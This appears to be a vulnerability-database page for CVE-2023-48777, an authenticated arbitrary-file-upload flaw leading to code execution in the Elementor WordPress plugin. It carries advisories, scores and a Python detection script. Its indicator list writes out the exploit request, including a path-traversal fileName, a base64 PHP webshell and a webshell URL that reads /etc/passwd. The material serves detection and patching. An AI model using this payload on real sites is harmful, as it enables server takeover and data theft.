CVE-2023-48777
Published 2024-03-26
Priority P179 · high · 8.8 CVSS 3.1
AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 4.10% (89.5th percentile)
Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder. This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| elementor.com | elementor_website_builder | 3.3.0 – 3.18.1 | — |
| elementor | website_builder | >= 3.3.0 < 3.18.2 | 3.18.2 |
Detection & IOCs (extracted from sources)
url: `/wp-admin/admin-ajax.php`
path: `/wp-content/plugins/elementor/`
command: `actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax`
command: `{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}`
path: `/../../../../<random>.php`
url: `/wp-content/<random>.php?cmd=cat+/etc/passwd`
url: `/wp-admin/post.php?post=1&action=elementor`
bytes: `PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=`
- Exploit targets the `elementor_ajax` action via admin-ajax.php with an `import_template` sub-action to upload a PHP webshell via path traversal in the `fileName` parameter.
- The uploaded PHP webshell payload (base64: PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=) decodes to `<?php echo system($_GET['cmd']); ?>`. Monitor for this string in uploaded files or POST bodies.
- Path traversal sequence `/../../../../` in the `fileName` field of the import_template action is used to place the PHP file outside the intended upload directory. Alert on this pattern in POST bodies to admin-ajax.php.
- After upload, the webshell is accessed under /wp-content/<filename>.php with a `cmd` GET parameter. Monitor for unexpected PHP file access under /wp-content/ with shell command parameters.
- Successful exploitation confirmed by `root:.*:0:0:` pattern in HTTP response body. Use this as a post-exploitation indicator in web server logs or WAF response inspection.
- Vulnerability affects Elementor Website Builder versions 3.3.0 through 3.18.1; presence of the plugin at /wp-content/plugins/elementor/ on unpatched sites is a risk indicator.
- Exploitation requires authentication at contributor-level or above; unauthenticated exploitation is not possible.
- Fixed in Elementor version 3.18.2; systems running 3.18.2 or later are not affected.
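
The request-side and access-side checks from the detection notes above, as an added example (not code from this page, Elementor or WordPress). The function names, the `.json`/`.zip` allow-list, the assumption that a default install serves only `index.php` directly under `/wp-content/`, and the sample bodies are all assumptions or constructed values.

```python
import base64, binascii, json, posixpath, re
from urllib.parse import parse_qs, urlencode

ALLOWED_EXT = {".json", ".zip"}   # assumption: legitimate template import types
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
# assumption: a default install serves only index.php directly under /wp-content/
DIRECT_PHP = re.compile(r"^/wp-content/(?!index\.php(\?|$))[^/?]+\.php(\?|$)")

def inspect_elementor_ajax(body):
    """Findings for one POST body sent to /wp-admin/admin-ajax.php."""
    form = parse_qs(body)                      # also URL-decodes the fields
    if form.get("action", [""])[0] != "elementor_ajax":
        return []
    try:
        actions = json.loads(form.get("actions", ["{}"])[0])
    except json.JSONDecodeError:
        return ["unparseable actions JSON"]
    findings = []
    for item in (actions.values() if isinstance(actions, dict) else []):
        data = item.get("data") if isinstance(item, dict) else None
        if not isinstance(data, dict) or item.get("action") != "import_template":
            continue
        name = str(data.get("fileName", ""))
        if ".." in name.replace("\\", "/").split("/"):
            findings.append("path traversal in fileName")
        if posixpath.splitext(name)[1].lower() not in ALLOWED_EXT:
            findings.append("unexpected fileName extension")
        try:
            raw = base64.b64decode(data.get("fileData", ""), validate=True)
        except (binascii.Error, ValueError, TypeError):
            raw = b""                          # not valid base64: nothing to scan
        if PHP_TAG.search(raw):
            findings.append("PHP open tag in fileData")
    return findings

def suspicious_wp_content_request(uri):
    """True for a request to a .php file sitting directly in /wp-content/."""
    return bool(DIRECT_PHP.match(uri))

def sample_body(file_name, content):
    """Build a constructed request body in the shape listed on this page."""
    actions = {"import_template": {"action": "import_template", "data": {
        "fileName": file_name, "fileData": base64.b64encode(content).decode()}}}
    return urlencode({"actions": json.dumps(actions), "_nonce": "0000000000",
                      "editor_post_id": 1, "initial_document_id": 1,
                      "action": "elementor_ajax"})

if __name__ == "__main__":
    print(inspect_elementor_ajax(sample_body("/../../../../example.php", b"<?php /* constructed */ ?>")))
    print(inspect_elementor_ajax(sample_body("hero.json", b'{"content": []}')))
    print(suspicious_wp_content_request("/wp-content/example.php?cmd=x"))
```
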
CVSS provenance
nvd · v3.1 · 8.8 HIGH · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck · 9.9 CRITICAL
GHSA
GHSA-vrwg-q62p-8qvc: Unrestricted Upload of File with Dangerous Type vulnerability in Elementor
ghsa_unreviewed · 2024-03-26
CVE-2023-48777 [CRITICAL] CWE-434 GHSA-vrwg-q62p-8qvc: Unrestricted Upload of File with Dangerous Type vulnerability in Elementor
VulnCheck
Elementor.Com Elementor Website Builder Unrestricted Upload of File with Dangerous Type Vulnerability
vulncheck · 2023 · CVSS 9.9
CVE-2023-48777 [CRITICAL] Elementor.Com Elementor Website Builder Unrestricted Upload of File with Dangerous Type Vulnerability
Affected: elementor Website Builder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elementor/elementor-3180-authenticatedcontributor-arbitrary-file-upload-to-remote-code-execution-via-template-import
Exploit PoC: https://vulncheck.com/xdb/d62c85f39e42
No detection rules found.
Nuclei
WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
nuclei · CVSS 8.8
CVE-2023-48777 [HIGH] WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
Template:
```yaml
id: CVE-2023-48777

info:
  name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
  impact: |
    Authenticated attackers with contributor-level access can exploit template import functionality to upload arb
```
No writeups or analysis indexed.
2024-03-26: Published
Exploited in the wild